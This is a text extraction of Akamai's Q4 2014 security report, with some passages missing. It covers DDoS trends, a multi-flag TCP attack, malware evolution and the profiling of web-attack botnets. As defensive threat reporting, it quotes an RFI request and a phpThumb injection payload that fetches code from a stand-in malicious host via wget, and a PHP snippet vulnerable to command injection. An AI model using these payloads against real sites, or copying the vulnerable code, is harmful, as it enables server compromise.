Professional Documents
Culture Documents
ak amais [ st at e o f t h e in t e r n e t] / security
TABLE OF CONTENTS
53
55
56
56
56
57
57
58
58
59
59
60
60
2
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
[ SECTION ] 1
ANALYSIS +
EMERGING TRENDS
new attack vector using a Christmas tree packet generated one of the quarters nine
largest attacks. It is described in the Attack Spotlight: Multiple TCP Flag DDoS
Attack in this report.
3
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
At a glance*
Compared to Q4 2013
Compared to Q3 2014
4
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
5
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Figure 1: While the number of multi-vector attacks has surged the past two quarters, the percentage of
multi-vector campaigns has continued to hover around the 50 percent mark
Malware is often used for DDoS botnet expansion. Malware trends multiplatform, operating system awareness and destructive malware are described in
the malware section of this report. Also in this report is a new botnet analysis
technique that uses distinct code in payloads to map botnet activity, actors and
victim web applications.
The highest bandwidth attack in Q4 was 158 Gbps, generated by a multi-vector
volumetric attack that used a SYN flood, UDP fragment flood and a UDP flood.
Overall, average peak bandwidth increased 52 percent from a year ago but was 54
percent lower than the most recent quarter, as shown in Figure 2.
6
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Figure 2: Average peak bandwidth has dropped since last quarter, but remains higher than it was a year ago
7
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Figure 3: Average peak volume dropped significantly, due to the larger number of attacks this quarter, coupled with fewer mega-attacks
Akamai
mitigated
nine
attacks
and
targets
gaming
of
were
the
high-bandwidth
8
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Figure 4: Akamai mitigated nine mega-attacks in Q4, down from 17 mega-attacks in Q3 2014
9
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
in the year: the ratio of volumetric attacks versus application-based DDoS attacks
was 9:1. These numbers repeated throughout 2014, as shown in Figure 6.
Attackers preference for volumetric infrastructure-based attacks may be due to ease
of execution: Internet infrastructure is growing. Surging economies and millions of
Internet-enabled devices are being added worldwide, making new resources available
for exploitation, botnet building and DDoS attacks. Infrastructure-based attack
resources are plentiful.
10
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
11
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
attack vectors were SYN floods (17 percent), SSDP floods (15 percent), UDP fragment
(14 percent), UDP floods (11 percent) and DNS attacks (11 percent). Additionally,
NTP attacks accounted for 8 percent, CHARGEN for 5 percent, ICMP for 4 percent,
ACK floods for 3 percent and RESET flood for 1 percent.
1.1B / Application Layer DDoS Attacks* / The top application-layer vector was HTTP
GET floods at 8 percent of all attacks, most of which match known DDoS kits such
as Spike. Other application-layer attacks were used less than 2 percent of the time,
including HTTP POST (1 percent), HTTP PUSH (0.5 percent) and HTTP HEAD
(0.2 percent).*
Successful application-based attacks require a higher level of attack expertise,
because most DDoS mitigation technology can stop simple HTTP GET and
POST floods. When the requests are refined, randomized and encoded, however,
they may bypass typical mitigation technology.
1.1C / Comparison: Attack Vectors (Q4 2014, Q3 2014, Q4 2013) / A new DDoS
attack vector was introduced in Q4. In late November, XMAS-DDoS with Christmas
tree packets was first observed. It is featured in the Attack Spotlight of this report.
Also, Q4 marked a greater number of all types of infrastructure attacks, except for
ICMP floods, compared to last quarter and Q4 2013. This reflects an overall increase
in number of DDoS attacks.
SYN floods and SSDP reflection floods were used extensively, contributing to the
increase of infrastructure-based attacks. These two attack vectors contributed 17
percent (SYN) and 15 percent (SSDP) to total attacks, as shown in Figure 7. The use
of SYN floods remained consistent with Q3.
12
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Figure 7: The popularity of attack vectors varies by quarter, but SYN floods and UDP floods remain
perennial favorites*
13
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
SSDP accounted for a significant 214 percent increase in number of attacks compared
to Q3. The SSDP protocol, which is used by UPnP devices, was a newly observed
attack in Q3 and has proven to be an increasingly popular attack vector. It may
not have yet have achieved its full potential. In Q3 2014, for example, an SSDPonly DDoS attack generated 54 Gbps. This quarter, Akamai mitigated a significantly
larger 106 Gbps SSDP attack. SSDP attacks may prove to be difficult to eradicate,
because in many cases, attack sources comprise Internet-enabled homes around
the world. Home users may lack the expertise to prevent these devices from
becoming unwilling participants in DDoS attacks they may not even know their
devices are being abused as SSDP reflectors.
In contrast, NTP and DNS servers are more likely to be operated by IT staff able
to detect and mitigate the abuse. New domains are constantly being created for
DNS reflection attacks, and administrators of open DNS resolvers have sought to
mitigate their abuse. NTP reflection attacks have as a result generally produced
less powerful attacks over time. That said, many vulnerable NTP servers are still
available as NTP reflection sources, and one of the nine attacks greater than 100
Gbps in Q4 was fueled by NTP abuse.
The fact that NTP reflection marked an increase in attacks by 181 percent compared
to Q3 is an indicator of the larger number of DDoS attacks overall in Q4, even
though NTP attacks were generally less effective and less popular than in the past.
Malicious actors make use of every resource available to them, including NTP
servers. A source of NTP reflection attacks were DDoS-for-hire sites, where NTP
reflection was one of the more common attack vectors available to paying customers.
Overall, Q4s infrastructure-based attacks increased 58 percent compared to Q3 and
121 percent compared to the same quarter a year earlier. Application-layer attacks
increased 51 percent over Q3 and dropped 16 percent from a year ago.
14
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Compared to a year ago, UDP fragment attacks increased 54 percent, and quarterover-quarter they increased 58 percent. Many reflection-based floods such as DNS,
SNMP and SSDP generate packets larger than allowed by the typical maximum
transmission unit (MTU). Such packets (exceeding 1,500 bytes) are fragmented
before reaching the target edge network and must be mitigated separately.
Increasing use of reflection attacks accounts for the increase in UDP fragment
floods. The sample stream in Figure 8 shows a typical CHARGEN flood packet. The
packet contained 6,108 bytes of data and was split into five parts.
81
0.055162 X.X.X.X -> X.X.X.X IPv4 1518 Fragmented
(proto=UDP 17, off=0, ID=458a)
82
0.055307 X.X.X.X -> X.X.X.X IPv4 1518 Fragmented
(proto=UDP 17, off=1480, ID=458a)
85
0.055411 X.X.X.X -> X.X.X.X IPv4 1518 Fragmented
(proto=UDP 17, off=2960, ID=458a)
86
0.055512 X.X.X.X -> X.X.X.X IPv4 1518 Fragmented
(proto=UDP 17, off=4440, ID=458a)
87
0.055518 X.X.X.X -> X.X.X.X UDP 234 Source port:
tion port: 2020
IP protocol
IP protocol
IP protocol
IP protocol
19
Destina-
Figure 8: A fragmented UDP payload, resulting from a single CHARGEN reflection reply
The packets do not arrive in order, and only the last packet has the port information,
as shown.
1.2 / Targeted Industries / The five most-attacked verticals in Q4 were gaming
(35 percent), software and technology (26 percent), Internet and telecom (11 percent),
media and entertainment (10 percent), and financial services (7 percent), as shown
in Figure 9.
15
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Figure 9: The gaming industry bore the brunt of DDoS attacks in Q4, driven by a surge in attack activity at
the end of December
1.2A / Gaming Industry / Gaming remained the most targeted industry since
Q2 2014 and experienced a 2 percent increase this quarter. In Q4, attacks were
fueled by malicious actors seeking to gain media attention or notoriety from
peer groups, damage reputations and cause disruptions in gaming services.
Some of the largest console gaming networks were openly and extensively
attacked in December 2014, when more players were likely to be affected.
Another trend was the holding of networks hostage, where the owners were
asked to pay a small ransom to stop a DDoS attack. This industry received a
similar percentage of all SYN floods (36 percent), SSDP floods (35 percent), DNS
floods (35 percent), NTP floods (36 percent) and UDP fragmentation attacks
(37 percent). It received relatively fewer of all UDP floods (26 percent) and GET
floods (25 percent).
16
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
companies that provide solutions such as Software-as-a-Service (SaaS) and cloudbased technologies. This industry saw the sharpest climb in attack rates, up 7 percent
from last quarter to 26 percent of all attacks. It received a similar percentage of
all SYN floods (27 percent), SSDP floods (24 percent), UDP fragmentation attacks
(24 percent), UDP floods (25 percent), DNS floods (24 percent), GET floods
(26 percent) and NTP floods (25 percent).
1.2C / Internet + Telecom / The Internet and telecom industry includes companies
that offer Internet-related services such as ISPs and CDNs. Although the target of
only 11 percent of all attacks, which was an increase of 2 percent, this industry was
the target of a disproportionate 18 percent of all DNS flood attacks in Q4. It was also
hit by 11 percent of SSDP floods, 13 percent of UDP floods and 10 percent of UDP
fragmentation attacks.
1.2D / Media / The media industry saw the biggest change in percentage of attacks,
institutions such as banks and trading platforms. The financial industry saw a small
decline (-2 percent) to 7 percent of all DDoS attacks. This industry received a similar
percentage of all attacks including SYN floods (8 percent), UDP fragmentation
attacks (9 percent) and DNS floods (10 percent).
1.3 / Top 10 Source Countries / The United States continued as the most
17
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Figure 10: The US and China accounted for almost 50 percent of attack traffic in Q4 2014
The United States and China placed consistently in the top spots for DDoS sources
in Q4 2014, Q3 2014 and Q4 a year ago. Combined, they sourced 40 to 50 percent
of attacks. The United States placed first in Q4 2013 at 24 percent, first in Q3 of 2014
with 24 percent and first in Q4 2014 with 32 percent, as shown in Figure 11.
18
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
China has placed second in all three quarters as well with Q4 2013 (19 percent),
Q3 2014 (20 percent) and Q4 2014 (18 percent).
India and Korea appeared consistently in the top 10 source countries in each of
the three quarters. India ranged from sixth place in Q4 2013 (7 percent), ninth in
Q3 2014 (3 percent) and sixth in Q4 2014 (4 percent). Korea placed fifth in
Q4 2013 (7 percent), fifth in Q3 2014 (6 percent) and ninth in Q4 2014 (4 percent).
Other countries appeared on the list in the past but did not appear more recently.
The United Kingdom did not appear in the top ten source countries last quarter,
but it was fourth in Q4 2013 (8 percent) and eighth in Q4 2014 (4 percent).
Thailand placed third a year ago (14 percent) and tenth in Q3 2014 (3 percent)
but not in Q4 2014. Brazil placed ninth in Q4 a year ago (5 percent) and third in
Q3 2014, but stayed off the list in Q4 2014.
Mexico appeared recently in fourth place in Q3 2014 (14 percent) and in fourth
place in Q4 (12 percent). Similarly, Russia did not appear in Q4 a year ago but placed
eighth in Q3 2014 (3 percent) and tenth in Q4 2014 (4 percent). Germany also did
not appear in Q4 a year ago, but placed sixth in Q3 2014 (6 percent) and third in
Q4 2014 (12 percent).
Other countries with single appearances in the chart in the selected quarters include
Turkey in Q4 2013 (6 percent), Italy in Q4 2013 (6 percent), France in Q4 2014
(8 percent), and Spain in Q4 2014. Japan only appeared in Q3 2014 (4 percent).
In contrast to Q3 when there was a notable presence of BRIC countries, Q4 attack
sources were dominated by the United States, China and Western Europe.
19
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Figure 11: The US and China consistently make the top 10 list of attack source IPs
1.4 / Total Attacks per Week (Q4 2014 vs. Q4 2013) / Figure 12 shows the percentage
increase and decrease of the total number of attacks per week in Q4 year-overyear. Of the three months of the quarter, Akamai mitigated the greatest number of
DDoS attacks in December. The last two weeks were the busiest with the last week
posting a 1,100 percent increase over the same week a year ago. The boost in activity
in Q4 was attributed to attacks against the gaming industry.
20
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Figure 12: Weekly DDoS attacks surged in December 2014 compared to December 2013, fueled by attacks
in the gaming industry
1.5 / Comparison: Attack Campaign Start Times (Q4 2014, Q3 2014, Q4 2013) /
Last quarter PLXsert observed that the start times for attacks were becoming more
uniformly spread across a 24 hour period, an observation that led to the hypothesis:
As targets in previously underrepresented geographic locations increase in value and
foreign tech markets continue to grow, attack [start] times are likely to become more
evenly distributed. In fact, the same spreading trend continued in Q4. PLXsert
measured an uptick in attack targets in Asia, Western Europe and South America and
observed an increase in cybersecurity and DDoS-associated technology spending
in China, Germany, France, Spain, India and Korea. The diffusion of attack start
times will likely continue.
A widening scope of targets and the proliferation of attacks across industries and
geographies correlates with the spreading of attack distribution data across a 24hour period. Attacks were spread out over more hours and had a lesser range
21
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
between the maximum and minimum number of attacks per hour, as shown in
Figure 13. In the past, attack traffic varied more throughout the day as shown by the
Q4 2013 data.
Figure 13: Attack traffic varied more throughout the day a year ago than in the two most recent quarters.
In the figure, the most recent quarter exemplifies this range reduction. In Q4 2014,
for example, the lowest percentage of total attacks (2 percent) occurred at hour 16:00,
while the highest percentage (5 percent) occurred at hour 19:00 a 3 percent difference.
In contrast, the range of the previous quarter was 4 percent. The least popular hour
of attack, 16:00, had 2 percent of total attacks, and the most popular hour of attack,
00:00, had 6 percent.
22
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Likewise, Q4 a year ago had a range of almost 8 percent with the least popular
hour of attack, 05:00, at 0.5 percent of attacks, and the most popular hour,
20:00, at 8 percent.
23
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
[ SECTION ] 2
ATTACK SPOTLIGHT
Multiple TCP Flags
DDoS Attack
it indicates the ongoing development of DDoS attack tools. Although it was not a
record-breaking attack, it was large peaking at 131 Gigabits per second (Gbps) and
44 Million packets per second (Mpps) a level that would slow or cause an outage
in most corporate infrastructures. The attacks occurred in August and again in
December.
24
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
2.1 / SYN with a Side of Everything / The TCP-based attack was packed with
TCP flags. One packet exhibited the greatest number of simultaneous flags set of all
the packets only an ACK flag was missing. The flags are shown within brackets in
the tcpdump output in Figure 14. In the order in which they appear [FSRPUEW],
the flags included FIN, SYN, RST, PSH, URG, ECN, and CWR. Such a flag-filled
packet is commonly called a Christmas tree packet. Such packets are almost always
suspicious. They are designed to take more processing power than usual packets
and thus are commonly used in denial of service attacks. They may also be used for
reconnaissance to see how a target responds.
23:56:52.391222 IP 223.85.88.158.46642 > X.X.X.165.165: Flags [FSRPUEW], seq 3923992143:3923992144, win 24051, urg 0, length 1
Figure 14: This notable packet had the most flags set during this DDoS campaign
Although the attack seems to be executed like a SYN flood, there are some
differences that may indicate the use of a new attack tool. The resulting payloads
can be simulated closely using applications such as Scapy and hping (Linux).
Figure 15 simulates the live DDoS packet in Figure 14.
10:28:58.987897 IP 10.0.20.15.2215
> 192.168.20.62.62: Flags
[FSRPUEW], seq 1141824621:1141824622, win 24051, urg 0, length 1
Figure 15: A lab reproduction of the packet using hping
26
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
In Figure 16, the Reset cause field is populated in TCP packets where the Reset flag
is set and with a length greater than 1. Using hping, similar results can be generated
in a lab environment as shown in the reproduction in Figure 17.
00:24:00.121872 IP 10.0.20.15.30312 > 192.168.20.62.443: Flags
[SRP.E], seq 1647155852:1647155913, ack 1674304533, win 50599,
length 61
00:24:00.121932 IP 10.0.20.15.30313 > 192.168.20.62.443: Flags
[SRP.E], seq 1276518082:1276518143, ack 948855161, win 50599,
length 61
00:25:00.975537 IP (tos 0x0, ttl 64, id 36810, offset 0, flags
[none], proto TCP (6), length 101)
10.0.20.15.25416 > 192.168.20.62.443: Flags [SRP.E], cksum 0xd610
(incorrect -> 0x8345), seq 1218010765:1218010826, ack 234896243,
win 50599, length 61 [RST+ \0xb0\0x04\0x08\0x07\0x08\0x00\0x00(\0xb0\0x04\0x08\0x07\0x09\0x00\0x00,\0xb0\0x04\0x08\0x07\0x0a\0x00\0x000\0xb0\0x04\0x08\0x07\0x0b\0x00]
Figure 17: An hping reproduction in the lab with extra data showing as Reset cause
Some of the aspects that make this attack unique also make it less effective.
For example, some of the TCP flag combinations do not even render a response
from the target. Regardless, the attack achieved its goal by generating high traffic
volumes and high packet rates, as shown in Figure 18. This is enough traffic to hinder
or completely clog most corporate infrastructures and it highlights the ongoing
development of DDoS tools.
27
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
This particular attack appears to be a calling card of sorts for a group claiming to
be Lizard Squad. Each attack against this particular Akamai customer revealed the
same use of multiple TCP flags in each packet. The initial campaign in August,
although mixed with a UDP flood, contained similar characteristics while also
containing some differences that may indicate a new group of attackers.
2.2 / Attack Attribution / Figure 19 depicts attack dates for three attack campaigns
that used the multiple-flag DDoS attack. This flag combination has only been
observed in attacks against one Akamai customer.
28
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Attack Timeline
Although Lizard Squad claimed responsibility for the attacks, differences in the third
attack campaign draw speculation of a new attacker. The first two attack campaigns
targeted two specific web server IP addresses, which could easily be determined by
resolving the target website IP address. In addition, the first two attack campaigns,
despite including an extra attack vector, did not produce even half of the volume of
the third attack campaign.
Although the first two attacks included a UDP flood, as shown in Figure 20, the third
campaign did not make use of the UDP flood attack vector and it was a much larger
attack. The third campaign also targeted random hosts in a specific /24 network and
made use of the extra data in the Reset cause field on the packets with the Reset flag set.
29
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Although there are similar footprints in all three campaigns, the expansion and
sophistication of the third campaign suggests this group has been incorporating
new resources from the DDoS-for-hire underground. These resources have
helped them produce greater volumes of attack traffic in comparison with their
previous campaigns.
The group used social media to amplify its claims of successful attacks,
garnering attention. They were successfully mitigated by Akamai and were not
record-setting attacks.
30
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
[ SECTION ] 3
CASE STUDY
The Evolution of
Malware: From
Cross Platform to
Destruction
alware distribution has evolved through the years from the first
worms transferred via diskettes (Elk CLoner) to sophisticated viruses
spread across USB interfaces (Conficker). As new types of malicious
software were developed, the term malware was introduced to describe a broad
category that included Trojans, viruses, worms and more.
31
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Innovative attack tactics and techniques have proliferated over the years as defenders
of computing systems have become more aware of the tricks malware developers
use to infect systems. Malware authors, in turn, have developed new infection
approaches for new operating systems and now look for ways to widen their nets
further to infect not just one type of machine at a time, but multiple operating
systems at once.
3.1 / Malware Classification / Malicious software can be classified by its features
32
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
33
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
a threat advisory in September 2014 about the IptabLes and IptabLex DDoS threat
targeting Linux platforms. It was propagated by targeting vulnerabilities in web
services such as Apache Struts, Tomcat and ElasticSearch. Soon after the advisory
was released, a malware variant written for Windows made its way into the public
space. While the Windows variant did not have the same impact as the Linux
variant, it became clear that the authors were creating variations of the threat to
target multiple operating systems.
Although little information has been collected about the methods used to propagate
the Windows variant of IptabLes, the motive of the malware writers is clear. A
rewrite or recompilation of the malware was likely required in order to produce
a Windows-compatible version, and string artifacts present in the binary indicate
strongly that the malware was repurposed to infect Windows machines.
Figure 21 shows some of the string data present in the Windows version of IptabLex.
34
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Figure 22 shows similar string data from within the original Linux payload.
Matching strings, such as targeted domains used for DNS resolution and web
requests, can be observed when comparing these two variants.
35
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
36
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
The IptabLes threat was successful due to the abuse of vulnerabilities of popular
web services usually running on Linux servers. Malicious actors typically use the
route of least resistance to quickly build a botnet of considerable size. These botnets
are then used in campaigns or sold in an underground market called DDoS-forhire services.
3.5 / A RAT That Is Operating
System Aware / In October 2012, Mac
stealing
Minecraft
passwords.
that include surveillance, infiltration and persistence. One of the first actions usually
taken after a successful infiltration is to establish persistence on the victim system.
In the case of a campaign carried out by DarkSeoul, a group responsible for a string
37
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Figure 26: This code extracts the embedded malware during runtime
One of the embedded payloads was designed to find hard disks and
partitions on the infected system and overwrite the entire drive, effectively
deleting all of its content. Figure 27 shows some strings found in the DLL payload
designed to wipe an entire hard drive.
38
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
It replaces the contents with the data represented by the string PRINCPES as shown
by the API calls in Figure 28. It then subsequently attempts to find the next drive
and partition on the victim system.
Figure 28: A runtime analysis of API calls to overwrite hard disk data
39
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
The amount of damage that can be caused by such virus is massive, and malicious
actors are only getting more motivated and sophisticated in their efforts. Recent
campaigns described by Symantec reveal how data exfiltration and stealth are an
important aspect of cyber warfare. The destruction of evidence is made possible by
payloads such as the DarkSeoul group payloads above.
3.7 / Conclusion / The use of malware as tools of the trade by malicious actors is
here to stay. Malware has evolved new features and adapted in response to security
measures. The antivirus industry reacts to new threats by providing signatures of
known malware. However, malicious actors have adapted their methods to bypass
these defenses and developed new tools and exploits to further their campaigns.
Some malware campaigns are destructive, making malware even more malicious.
Some may even jeopardize business and organizational continuity.
40
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
[ SECTION ] 4
BOTNET PROFILING
TECHNIQUE
kamai has profiled multiple web application attack botnets using a new
analysis technique that takes advantage of data gleaned from the Akamai
Intelligent Platform. The identified botnets were set up to automate the
discovery of web application vulnerabilities for Remote File Inclusion (RFI) and OS
Command Injection attacks. Akamai researchers profiled the botnets by identifying
malicious code resource URLs and payloads that were identical among seemingly
unrelated attacks. An attack payload was used to aggregate data and map botnet
activity, actors and victim web applications.
41
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
This technique could be applied to other types of attacks that use a distinct payload,
such as one associated with a specific third-party domain or a common code snippet.
The analysis can be conducted without being part of the botnet or taking over the
botnets command-and-control (C&C, C2) server.
The botnet profiled here has attacked targets around the world from geographically
dispersed sources. Once the botnet controls a machine, it is capable of remote shell
command execution and remote file upload, as well as Short Message Service (SMS)
and Internet Relay Chat (IRC) communication.
4.1 / About Remote File Inclusion Attacks / A remote file inclusion attack
42
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
In this code, the developer receives a module name from a user-submitted query
string parameter called module_name. The developer then uses this input (assuming
it is a directory name) inside a call to the PHP include() function. A malicious
hacker may exploit this vulnerability to include a remote piece of code, as shown in
Figure 30.
GET /page.php?module_name=http://www.malicious.site/bad.php?
Figure 30: Malicious actors transform the PHP include function into a query
43
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
<?php
if(isset($_GET[cmd]))
{
$cmd = LicenseChecker.exe . $_GET[cmd];
passthru ($cmd);
}
?>
Figure 31: Code vulnerable to an OS command injection attack
Exposures (CVE) database and other vulnerability databases, such as The Exploit
Database, remote file inclusion and OS command injection vulnerabilities are
among the most prevalent vulnerabilities reported and exist in many modern web
applications and web frameworks.
The frequency with which these vulnerabilities are present and their ability to grant
full control over the victim web server make them the most favorable attack vectors
for malicious actors. In recent months, Akamai has observed massively orchestrated
attempts to find such vulnerabilities in an automated manner using specially
tailored botnets.
A malicious actor or group will usually write a piece of code to scan for RFI or
command injection vulnerabilities, sending a unique malicious payload inside a
parameter value. This malicious payload will usually point to a remote web server
owned or controlled by the hacker, which includes the PHP code to be included or
fetched. Attackers may use a botnet (a distributed network of machines running the
same piece of scanning code) to speed up the scanning process.
44
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
10.1.1.1
http://www.victim1.site/page.php?module_name=http://www.malicious.
site/bad.php
192.168.1.1
http://www.victim2.site/index.php?inc_path=http://www.malicious.site/
bad.php
The similarities indicate a botnet of machines performing the same task for the
same master.
Figure 32 illustrates two RFI attacks targeting two different web applications and
coming from two different attackers but pointing to the same remote malicious
piece of code.
45
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Figure 32: Different attackers using the same remote malicious code
botnets targeted more than 850 web applications across several top-level domains,
as shown in Figure 33.
46
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Targets
.com
485
.gov
79
.edu
.org
.mil
Country TLDs
270
The top 10 country top-level domains of victim sites were distributed as shown in
Figure 34.
Victim Sites
Country TLD
23
.uk
20
.ca
14
.jp
13
.de
12
.es
12
.fr
11
.be
11
.nl
.ln
.dk
Targeted web applications were distributed across verticals as shown in Figure 35.
47
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Industry Vertical
Retail
26.4
15.8
12.4
Public Sector
12.0
High Technology
8.3
Business Services
7.3
Consumer Goods
5.3
Financial Services
3.9
Automotive
3.0
Manufacturing
1.5
Gaming
1.1
Pharma/Health Care
0.9
Software as a Service
0.8
Foundation
0.6
0.3
Consumer Services
0.2
Miscellaneous
0.2
4.4B / Attack Traffic Origins / All of the botnet attack traffic appeared to
Number of Bots
Apache
11
Microsoft IIs
NGINX
Unindentified
A closer look at the source countries of the attacking machines reveals attacks coming
from 15 countries, as shown in figure 37. About a third of the attacking machines
were located in the U.S. Only a minority of attacks came through proxies, which
makes sense given that the attacking machines were compromised web servers.
Country
Attackers
United States
10
United Kingdom
France
Germany
Spain
Argentina
Canada
Indonesia
Israel
11
Japan
South Korea
Romania
Turkey
Taiwan
Vietnam
Figure 37: Origins of attack traffic, which was all generated by compromised web servers
49
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Crawling capabilities for this kind of botnet are unusual and seems to indicate a
technological advancement. The vast majority of similar botnets observed by
Akamai are simple; scanning the Internet in a blind manner, looking for known
vulnerabilities rather than probing to discover application-specific vulnerabilities.
4.4D / Propagation / Botnet operators strive to keep their botnets alive and
http://www.victim.site/phpThumb.php?
rc=file.jpg&fltr[]=blur%7C9%20-quality%2075%20-interlace%20line%20
fail.jpg%20jpeg:fail.jpg%20;ls;&phpThumbDebug=9%0A?src=file.jpg&fltr[]=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20
jpeg:fail.jpg%20;wget% http://wordpress.com.malicious.site/evil.php
%20-O%20evil.php;&phpThumbDebug=9
Figure 39: Sample payload 2
Another attribute of the botnet was its thorough coverage of all digital properties
belonging to the victims organization. For example, for each target organization the
botnet would scan all possible domains (i.e. victim.com, victim.co.uk, victim.de, etc).
50
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
attacks both point to a malicious PHP resource that is accessible over the web, the
task of obtaining the remote code is rather simple all one has to do is download
the code using a browser or HTTP client. The botnet code had text written in Malay,
which may indicate the botnet owner is Malaysian.
4.5A / Remote Shell Command Execution / As shown in the source code in
Figure 40, the botnet enables a remote user to execute commands on the victim
application by using PHPs shell_exec() command.
4.5B / Remote File Upload / The botnet also enables a remote attacker to upload
arbitrary files to the victims machine quickly and easily, as shown in Figure 41.
51
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
discovered in the code was the ability to send SMS (through a dedicated web
service). This capability was controlled by commands sent to the botnet via IRC
channels, as shown in Figure 42.
Figure 42: The botnet code for SMS-sending capability, which works over a dedicated IRC-channel
4.5D / Other Capabilities / The following two capabilities were also identified:
52
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
53
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
[ SECTION ] 5
PERFORMANCE
MITIGATION
Bots, Spiders and Scrapers
access data, but many now use screen-scraping to collect information. As bots and
scrapers become more prevalent, they increase the load on web servers. While bot
behavior is benign for the most part, poorly-coded bots can impact site performance
and may resemble denial of service attacks or may be part of a rivals competitive
intelligence program. Understanding the different categories of third-party content
bots, how they affect a website, and how to mitigate their impact, is an important
part of building a secure web presence.
54
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
Akamai has seen bots and scrapers used for many purposes including:
Setting up fraudulent sites
Reuse of consumer price indices
Analysis of corporate financial statements
Metasearch engines
Search engines
Data mashups
Analysis of stock portfolios
Competitive intelligence
Location tracking
Examples of some of these uses of third-party site content are shown in Figures 43,
44 and 45.
Figure 43: Bot targeting a financial aggregator to scrape a large amount of data quickly
55
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
5.1 / Four Categories of Bots and Scrapers / Bots and scrapers can be divided
56
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
desired bot. These bots help users find content and are well-behaved they respect
robots.txt and dont make many requests at once.
5.1B / Undesired, Highly Aggressive / Some benign bots are poorly-coded and
send a large volume of requests or have poor error handling, which puts them in
an undesired category. Malicious bots that disrupt web servers by using GET or
POST floods also fit in this category; in extreme cases, a bot may cause a small-scale
application-layer denial of service attack. Some very aggressive scrapers attempt to
iterate through lists of stocks or airfares very rapidly. In one case, a bot looking for
pricing information on a retailer site disrupted analytics by making a high number
of requests for a small number of products.
During 2014, Akamai has observed a substantial increase in the number of these
bots and scrapers hitting the travel, hotel and hospitality sectors. The growth in
scrapers targeting these sectors is likely driven by a proliferation of rapidly developed
mobile apps that use scrapers as the fastest and easiest way to collect information
from disparate websites.
Scrapers target room rate pages for hotels, as well as pricing and schedules
for airlines. In many cases that Akamai has investigated, scrapers and bots were
making several thousand requests per second, far in excess of what can be expected
by a human using a web browser.
5.1C / Highly Desired, High Aggression / Highly desirable bots with high
aggression are more difficult to manage because they cant be blocked totally.
However, their aggressiveness can cause site slowdowns and latency. An example is
the spider bot from the Chinese search engine Baidu. Baidu bots have poor request
throttling, and can even saturate their own outbound network. This type of search
57
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
spider can help organizations attract new users in emerging markets, such as Brazil,
Russia, India and China, but in the process, they may flood sites with requests and
thus trigger alerts for possible denial of service attacks.
5.1D / Low Desirability, Low Aggression / Bots that crawl a sites product pages
with intent to reuse the content on shadow sites for fraud or counterfeiting scams
fit into this category. These bots often stay under the detection threshold of security
products and try to blend in with regular user traffic through the use of headless
browsers such as PhantomJs, making them difficult to block.
An interesting development in the use of headless browsers is the advent of
companies that offer scraping as a service, such as PhantomJs Cloud. These sites
make it easy for users to scrape content and have it delivered, lowering the bar to
entry and making it easier for unskilled individuals to scrape content while hiding
behind a service.
5.2 / Triage and Categorization / Mitigation techniques vary depending on the
classification of the bot. Akamai uses a wide variety of techniques to determine the
owner and intent of a bot. For example, the volume of requests can help Akamai
determine the bots platform. In general, we use the following categorizations:
Home broadband connection: 1,000-4,000 requests per minute
Branch office: 5,000-10,000 requests per minute
Hosted server or server farms: 10,000+ requests per minute
The sequence and pages a bot scrapes can also reveal information about the bots
intent. For example, a competitive-analysis bot will only scrape product descriptions,
SKU/item IDs and prices, while a fraudulent bot will also request images. A website
copier, such as a recursive Wget (formerly Geturl), also loads index and search pages.
58
The State of the Internet [security] / Q4 2014 / www.stateoftheinternet.com
